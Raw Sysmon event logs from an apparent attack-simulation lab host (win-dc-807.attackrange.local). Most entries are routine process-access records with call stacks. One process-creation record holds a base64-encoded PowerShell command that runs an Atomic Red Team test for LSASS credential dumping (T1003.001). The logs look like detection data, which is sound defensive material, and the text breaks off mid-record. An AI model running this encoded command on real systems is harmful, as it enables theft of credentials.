15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-EB00-000000008801}4612C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7CD8-5FA1-EB00-000000008801}4612C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.000{D28789B6-7CD8-5FA1-EB00-000000008801}4612C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-0201-000000008801}1164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-0201-000000008801}1164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD9-5FA1-0201-000000008801}1164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df839e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64) 154100x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.939{D28789B6-7CD9-5FA1-0201-000000008801}1164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\rnjnhxos\rnjnhxos.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 11241100x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.932{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\rnjnhxos\rnjnhxos.cmdline2020-11-03 15:52:57.932 11241100x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:57.932{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\rnjnhxos\rnjnhxos.dll2020-11-03 15:52:57.932 10341000x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-0101-000000008801}2400C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 